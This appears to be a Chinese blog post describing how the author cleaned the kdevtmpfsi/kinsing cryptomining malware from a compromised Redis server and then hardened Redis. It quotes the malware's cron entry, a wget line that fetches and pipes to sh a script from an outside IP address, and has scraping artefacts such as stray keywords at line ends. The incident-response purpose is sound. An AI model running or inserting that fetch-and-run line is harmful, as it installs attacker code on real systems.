完全清除redis kdevtmpfsi (挖矿病毒)

最近公司服务器上redis老是过几天就断一次,以前一直好好的,而后就上服务器上去看。一看发现内存占用变成92%,而后有两个cpu占用100%。使用top命令查看后,发现redis有两个进程占了很大资源,这两个进程就是kdevtmpfsi。redis

而后就开始百度,百度结果是先中止kdevtmpfsi的守护进程kinsing,而后再中止kdevtmpfsi。最后去tmp目录下把这两个文件都删除了。并使用crontab -l来查看有无定时任务,结果没发现。而后觉得就能够了,结果过了两个小时,这个病毒又复活了。安全

最后又百度才发现,crontab -l这个命令并非列出全部用户的定时任务,再次查看kdevtmpfsi的运行状态,发现是redis用户,因而使用crontab -l -u redis。终于发现了有问题的定时任务。而后删除了它,再重复上面过程,到如今已通过了2天,病毒没再出现。服务器

病毒定时任务:
wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

用到的命令以下code

1. top //显示或管理执行中的程序
2. ps -ef |grep kdevtmpfsi //查看kdevtmpfsi进程信息,记录它pid和用户
3. ps -ef |grep kinsing //查看kinsing 进程信息,记录它pid和用户
4. crontab -l -u redis //查看对应用户的定时任务,若是2,3命令反馈结果对应用户是redis,就像这条命令同样
5. crontab -e -u redis //编辑定时任务,删除病毒的定时任务
6. kill -9 [pid] //把[pid]替换城2,3命令记录的pid,先执行kinsing的pid,再执行kdevtmpfsi的pid
7. rm -rf /tmp/kdevtmpfsi //删除kdevtmpfsi
8. rm -rf /tmp/kinsing //删除kdevtmpfsi

最后最重要的仍是要注意redis安全问题,否则之后仍是可能中病毒。必定要记得改redis默认端口,设置redis密码,而后设置为只能内网访问。进程

相关文章
相关标签/搜索